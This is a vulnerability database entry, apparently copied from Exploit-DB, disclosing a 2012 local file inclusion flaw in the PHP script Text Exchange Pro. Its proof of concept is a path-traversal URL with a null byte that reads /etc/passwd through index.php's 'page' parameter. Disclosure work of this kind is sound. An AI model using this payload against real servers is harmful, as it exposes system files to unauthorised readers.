Text Exchange Pro (index.php page) Local file inclusion

vendor:

Text Exchange Pro

by:

Yakir Wizman

7,5

CVSS

HIGH

Local file inclusion

CWE

Product Name: Text Exchange Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Text Exchange Pro (index.php page) Local file inclusion

Text Exchange Pro is an unique PHP script for running your own text link exchange system. Local file inclusion vulnerability exists in the index.php page of the application, which allows an attacker to read sensitive files from the server.

Mitigation:

Input validation should be done to prevent local file inclusion attacks.

Source

Exploit-DB raw data:

-----------------------------------------------------------
Text Exchange Pro (index.php page) Local file inclusion
Bug discovered by Yakir Wizman
Date 24/08/2012
Vendor Homepage - http://www.phpwebscripts.com/text-exchange-pro/
Demo - http://www.scripts-demo.com/textexchangepro/
ISRAEL
-----------------------------------------------------------
       Author will be not responsible for any damage.
-----------------------------------------------------------

About the Application
-----------------------------------------------------------
Text Exchange Pro is an unique PHP script for running your own text link exchange system.


Proof Of Conecpt
-----------------------------------------------------------
Local file inclusion (Severity is high)
Vulnerable URL	: http://server/textexchangepro/index.php?page=../../../../../../../../../../etc/passwd%00